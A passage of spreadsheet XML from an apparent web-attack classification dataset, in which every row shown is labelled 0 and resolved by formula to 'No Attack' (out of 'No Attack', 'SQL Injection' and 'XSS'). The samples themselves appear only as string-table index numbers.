      <c r="C30856" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30857" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30857" s="1" t="s">
        <v>9957</v>
      </c>
      <c r="B30857">
        <v>0</v>
      </c>
      <c r="C30857" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30858" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30858" s="1" t="s">
        <v>10174</v>
      </c>
      <c r="B30858">
        <v>0</v>
      </c>
      <c r="C30858" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30859" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30859" s="1" t="s">
        <v>10009</v>
      </c>
      <c r="B30859">
        <v>0</v>
      </c>
      <c r="C30859" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30860" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30860" s="1" t="s">
        <v>9935</v>
      </c>
      <c r="B30860">
        <v>0</v>
      </c>
      <c r="C30860" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30861" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30861" s="1" t="s">
        <v>10049</v>
      </c>
      <c r="B30861">
        <v>0</v>
      </c>
      <c r="C30861" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30862" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30862" s="1" t="s">
        <v>10138</v>
      </c>
      <c r="B30862">
        <v>0</v>
      </c>
      <c r="C30862" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30863" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30863" s="1" t="s">
        <v>10018</v>
      </c>
      <c r="B30863">
        <v>0</v>
      </c>
      <c r="C30863" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30864" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30864" s="1" t="s">
        <v>10155</v>
      </c>
      <c r="B30864">
        <v>0</v>
      </c>
      <c r="C30864" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30865" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30865" s="1" t="s">
        <v>10092</v>
      </c>
      <c r="B30865">
        <v>0</v>
      </c>
      <c r="C30865" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30866" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30866" s="1" t="s">
        <v>10011</v>
      </c>
      <c r="B30866">
        <v>0</v>
      </c>
      <c r="C30866" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30867" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30867" s="1" t="s">
        <v>10178</v>
      </c>
      <c r="B30867">
        <v>0</v>
      </c>
      <c r="C30867" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30868" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30868" s="1" t="s">
        <v>9978</v>
      </c>
      <c r="B30868">
        <v>0</v>
      </c>
      <c r="C30868" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30869" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30869" s="1" t="s">
        <v>9973</v>
      </c>
      <c r="B30869">
        <v>0</v>
      </c>
      <c r="C30869" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30870" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30870" s="1" t="s">
        <v>9961</v>
      </c>
      <c r="B30870">
        <v>0</v>
      </c>
      <c r="C30870" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30871" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30871" s="1" t="s">
        <v>10087</v>
      </c>
      <c r="B30871">
        <v>0</v>
      </c>
      <c r="C30871" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30872" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30872" s="1" t="s">
        <v>10016</v>
      </c>
      <c r="B30872">
        <v>0</v>
      </c>
      <c r="C30872" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30873" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30873" s="1" t="s">
        <v>10149</v>
      </c>
      <c r="B30873">
        <v>0</v>
      </c>
      <c r="C30873" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30874" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30874" s="1" t="s">
        <v>10112</v>
      </c>
      <c r="B30874">
        <v>0</v>
      </c>
      <c r="C30874" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30875" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30875" s="1" t="s">
        <v>9970</v>
      </c>
      <c r="B30875">
        <v>0</v>
      </c>
      <c r="C30875" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30876" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30876" s="1" t="s">
        <v>10164</v>
      </c>
      <c r="B30876">
        <v>0</v>
      </c>
      <c r="C30876" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30877" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30877" s="1" t="s">
        <v>10030</v>
      </c>
      <c r="B30877">
        <v>0</v>
      </c>
      <c r="C30877" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30878" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30878" s="1" t="s">
        <v>9993</v>
      </c>
      <c r="B30878">
        <v>0</v>
      </c>
      <c r="C30878" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30879" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30879" s="1" t="s">
        <v>10140</v>
      </c>
      <c r="B30879">
        <v>0</v>
      </c>
      <c r="C30879" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30880" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30880" s="1" t="s">
        <v>9968</v>
      </c>
      <c r="B30880">
        <v>0</v>
      </c>
      <c r="C30880" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30881" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30881" s="1" t="s">
        <v>10134</v>
      </c>
      <c r="B30881">
        <v>0</v>
      </c>
      <c r="C30881" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30882" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30882" s="1" t="s">
        <v>9966</v>
      </c>
      <c r="B30882">
        <v>0</v>
      </c>
      <c r="C30882" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30883" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30883" s="1" t="s">
        <v>9932</v>
      </c>
      <c r="B30883">
        <v>0</v>
      </c>
      <c r="C30883" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30884" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30884" s="1" t="s">
        <v>10013</v>
      </c>
      <c r="B30884">
        <v>0</v>
      </c>
      <c r="C30884" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30885" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30885" s="1" t="s">
        <v>9990</v>
      </c>
      <c r="B30885">
        <v>0</v>
      </c>
      <c r="C30885" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30886" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30886" s="1" t="s">
        <v>10169</v>
      </c>
      <c r="B30886">
        <v>0</v>
      </c>
      <c r="C30886" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30887" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30887" s="1" t="s">
        <v>10051</v>
      </c>
      <c r="B30887">
        <v>0</v>
      </c>
      <c r="C30887" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30888" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30888" s="1" t="s">
        <v>10023</v>
      </c>
      <c r="B30888">
        <v>0</v>
      </c>
      <c r="C30888" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30889" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30889" s="1" t="s">
        <v>9926</v>
      </c>
      <c r="B30889">
        <v>0</v>
      </c>
      <c r="C30889" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30890" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30890" s="1" t="s">
        <v>10117</v>
      </c>
      <c r="B30890">
        <v>0</v>
      </c>
      <c r="C30890" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30891" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30891" s="1" t="s">
        <v>10072</v>
      </c>
      <c r="B30891">
        <v>0</v>
      </c>
      <c r="C30891" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30892" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30892" s="1" t="s">
        <v>10046</v>
      </c>
      <c r="B30892">
        <v>0</v>
      </c>
      <c r="C30892" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30893" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30893" s="1" t="s">
        <v>10106</v>
      </c>
      <c r="B30893">
        <v>0</v>
      </c>
      <c r="C30893" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30894" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30894" s="1" t="s">
        <v>10110</v>
      </c>
      <c r="B30894">
        <v>0</v>
      </c>
      <c r="C30894" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30895" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30895" s="1" t="s">
        <v>10102</v>
      </c>
      <c r="B30895">
        <v>0</v>
      </c>
      <c r="C30895" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30896" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30896" s="1" t="s">
        <v>10104</v>
      </c>
      <c r="B30896">
        <v>0</v>
      </c>
      <c r="C30896" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30897" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30897" s="1" t="s">
        <v>10108</v>
      </c>
      <c r="B30897">
        <v>0</v>
      </c>
      <c r="C30897" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30898" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30898" s="1" t="s">
        <v>37252</v>
      </c>
      <c r="B30898">
        <v>0</v>
      </c>
      <c r="C30898" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30899" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30899" s="1" t="s">
        <v>36322</v>
      </c>
      <c r="B30899">
        <v>0</v>
      </c>
      <c r="C30899" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30900" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30900" s="1" t="s">
        <v>23699</v>
      </c>
      <c r="B30900">
        <v>0</v>
      </c>
      <c r="C30900" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30901" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30901" s="1" t="s">
        <v>22181</v>
      </c>
      <c r="B30901">
        <v>0</v>
      </c>
      <c r="C30901" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30902" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30902" s="1" t="s">
        <v>28297</v>
      </c>
      <c r="B30902">
        <v>0</v>
      </c>
      <c r="C30902" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30903" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30903" s="1" t="s">
        <v>29844</v>
      </c>
      <c r="B30903">
        <v>0</v>
      </c>
      <c r="C30903" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30904" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30904" s="1" t="s">
        <v>35434</v>
      </c>
      <c r="B30904">
        <v>0</v>
      </c>
      <c r="C30904" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30905" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30905" s="1" t="s">
        <v>30365</v>
      </c>
      <c r="B30905">
        <v>0</v>
      </c>
      <c r="C30905" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30906" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30906" s="1" t="s">
        <v>35026</v>
      </c>
      <c r="B30906">
        <v>0</v>
      </c>
      <c r="C30906" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30907" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30907" s="1" t="s">
        <v>30343</v>
      </c>
      <c r="B30907">
        <v>0</v>
      </c>
      <c r="C30907" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30908" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30908" s="1" t="s">
        <v>20172</v>
      </c>
      <c r="B30908">
        <v>0</v>
      </c>
      <c r="C30908" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30909" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30909" s="1" t="s">
        <v>37008</v>
      </c>
      <c r="B30909">
        <v>0</v>
      </c>
      <c r="C30909" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30910" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30910" s="1" t="s">
        <v>21764</v>
      </c>
      <c r="B30910">
        <v>0</v>
      </c>
      <c r="C30910" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30911" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30911" s="1" t="s">
        <v>21779</v>
      </c>
      <c r="B30911">
        <v>0</v>
      </c>
      <c r="C30911" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30912" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30912" s="1" t="s">
        <v>29948</v>
      </c>
      <c r="B30912">
        <v>0</v>
      </c>
      <c r="C30912" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30913" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30913" s="1" t="s">
        <v>29433</v>
      </c>
      <c r="B30913">
        <v>0</v>
      </c>
      <c r="C30913" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30914" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30914" s="1" t="s">
        <v>28590</v>
      </c>
      <c r="B30914">
        <v>0</v>
      </c>
      <c r="C30914" s="7" t="str">
        <f t="shared" si="482"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30915" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30915" s="1" t="s">
        <v>22428</v>
      </c>
      <c r="B30915">
        <v>0</v>
      </c>
      <c r="C30915" s="7" t="str">
        <f t="shared" ref="C30915:C30978" si="483">IF(B30915=0,"No Attack", IF(B30915=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30916" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30916" s="1" t="s">
        <v>22620</v>
      </c>
      <c r="B30916">
        <v>0</v>
      </c>
      <c r="C30916" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30917" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30917" s="1" t="s">
        <v>24115</v>
      </c>
      <c r="B30917">
        <v>0</v>
      </c>
      <c r="C30917" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30918" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30918" s="1" t="s">
        <v>32956</v>
      </c>
      <c r="B30918">
        <v>0</v>
      </c>
      <c r="C30918" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30919" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30919" s="1" t="s">
        <v>35781</v>
      </c>
      <c r="B30919">
        <v>0</v>
      </c>
      <c r="C30919" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30920" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30920" s="1" t="s">
        <v>23251</v>
      </c>
      <c r="B30920">
        <v>0</v>
      </c>
      <c r="C30920" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30921" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30921" s="1" t="s">
        <v>33411</v>
      </c>
      <c r="B30921">
        <v>0</v>
      </c>
      <c r="C30921" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30922" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30922" s="1" t="s">
        <v>27240</v>
      </c>
      <c r="B30922">
        <v>0</v>
      </c>
      <c r="C30922" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30923" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30923" s="1" t="s">
        <v>20573</v>
      </c>
      <c r="B30923">
        <v>0</v>
      </c>
      <c r="C30923" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30924" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30924" s="1" t="s">
        <v>29408</v>
      </c>
      <c r="B30924">
        <v>0</v>
      </c>
      <c r="C30924" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30925" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30925" s="1" t="s">
        <v>27846</v>
      </c>
      <c r="B30925">
        <v>0</v>
      </c>
      <c r="C30925" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30926" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30926" s="1" t="s">
        <v>33749</v>
      </c>
      <c r="B30926">
        <v>0</v>
      </c>
      <c r="C30926" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30927" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30927" s="1" t="s">
        <v>29446</v>
      </c>
      <c r="B30927">
        <v>0</v>
      </c>
      <c r="C30927" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30928" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30928" s="1" t="s">
        <v>22139</v>
      </c>
      <c r="B30928">
        <v>0</v>
      </c>
      <c r="C30928" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30929" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30929" s="1" t="s">
        <v>20356</v>
      </c>
      <c r="B30929">
        <v>0</v>
      </c>
      <c r="C30929" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30930" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30930" s="1" t="s">
        <v>30195</v>
      </c>
      <c r="B30930">
        <v>0</v>
      </c>
      <c r="C30930" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30931" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30931" s="1" t="s">
        <v>27684</v>
      </c>
      <c r="B30931">
        <v>0</v>
      </c>
      <c r="C30931" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30932" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30932" s="1" t="s">
        <v>32863</v>
      </c>
      <c r="B30932">
        <v>0</v>
      </c>
      <c r="C30932" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30933" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30933" s="1" t="s">
        <v>23944</v>
      </c>
      <c r="B30933">
        <v>0</v>
      </c>
      <c r="C30933" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30934" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30934" s="1" t="s">
        <v>23661</v>
      </c>
      <c r="B30934">
        <v>0</v>
      </c>
      <c r="C30934" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30935" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30935" s="1" t="s">
        <v>37260</v>
      </c>
      <c r="B30935">
        <v>0</v>
      </c>
      <c r="C30935" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30936" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30936" s="1" t="s">
        <v>32134</v>
      </c>
      <c r="B30936">
        <v>0</v>
      </c>
      <c r="C30936" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30937" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30937" s="1" t="s">
        <v>27715</v>
      </c>
      <c r="B30937">
        <v>0</v>
      </c>
      <c r="C30937" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30938" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30938" s="1" t="s">
        <v>33374</v>
      </c>
      <c r="B30938">
        <v>0</v>
      </c>
      <c r="C30938" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30939" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30939" s="1" t="s">
        <v>22007</v>
      </c>
      <c r="B30939">
        <v>0</v>
      </c>
      <c r="C30939" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30940" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30940" s="1" t="s">
        <v>33480</v>
      </c>
      <c r="B30940">
        <v>0</v>
      </c>
      <c r="C30940" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30941" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30941" s="1" t="s">
        <v>34825</v>
      </c>
      <c r="B30941">
        <v>0</v>
      </c>
      <c r="C30941" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30942" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30942" s="1" t="s">
        <v>32129</v>
      </c>
      <c r="B30942">
        <v>0</v>
      </c>
      <c r="C30942" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30943" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30943" s="1" t="s">
        <v>34997</v>
      </c>
      <c r="B30943">
        <v>0</v>
      </c>
      <c r="C30943" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30944" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30944" s="1" t="s">
        <v>30275</v>
      </c>
      <c r="B30944">
        <v>0</v>
      </c>
      <c r="C30944" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30945" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30945" s="1" t="s">
        <v>21955</v>
      </c>
      <c r="B30945">
        <v>0</v>
      </c>
      <c r="C30945" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30946" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30946" s="1" t="s">
        <v>34017</v>
      </c>
      <c r="B30946">
        <v>0</v>
      </c>
      <c r="C30946" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30947" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30947" s="1" t="s">
        <v>34393</v>
      </c>
      <c r="B30947">
        <v>0</v>
      </c>
      <c r="C30947" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30948" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30948" s="1" t="s">
        <v>36989</v>
      </c>
      <c r="B30948">
        <v>0</v>
      </c>
      <c r="C30948" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30949" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30949" s="1" t="s">
        <v>37036</v>
      </c>
      <c r="B30949">
        <v>0</v>
      </c>
      <c r="C30949" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30950" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30950" s="1" t="s">
        <v>27990</v>
      </c>
      <c r="B30950">
        <v>0</v>
      </c>
      <c r="C30950" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30951" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30951" s="1" t="s">
        <v>32112</v>
      </c>
      <c r="B30951">
        <v>0</v>
      </c>
      <c r="C30951" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30952" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30952" s="1" t="s">
        <v>28375</v>
      </c>
      <c r="B30952">
        <v>0</v>
      </c>
      <c r="C30952" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30953" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30953" s="1" t="s">
        <v>24097</v>
      </c>
      <c r="B30953">
        <v>0</v>
      </c>
      <c r="C30953" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30954" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30954" s="1" t="s">
        <v>31337</v>
      </c>
      <c r="B30954">
        <v>0</v>
      </c>
      <c r="C30954" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30955" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30955" s="1" t="s">
        <v>20712</v>
      </c>
      <c r="B30955">
        <v>0</v>
      </c>
      <c r="C30955" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30956" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30956" s="1" t="s">
        <v>21262</v>
      </c>
      <c r="B30956">
        <v>0</v>
      </c>
      <c r="C30956" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30957" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30957" s="1" t="s">
        <v>35254</v>
      </c>
      <c r="B30957">
        <v>0</v>
      </c>
      <c r="C30957" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30958" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30958" s="1" t="s">
        <v>27496</v>
      </c>
      <c r="B30958">
        <v>0</v>
      </c>
      <c r="C30958" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30959" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30959" s="1" t="s">
        <v>28008</v>
      </c>
      <c r="B30959">
        <v>0</v>
      </c>
      <c r="C30959" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30960" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30960" s="1" t="s">
        <v>23057</v>
      </c>
      <c r="B30960">
        <v>0</v>
      </c>
      <c r="C30960" s="7" t="str">
        <f t="shared" si="483"/>
        <v>No Attack</v>
      </c>
    </row>
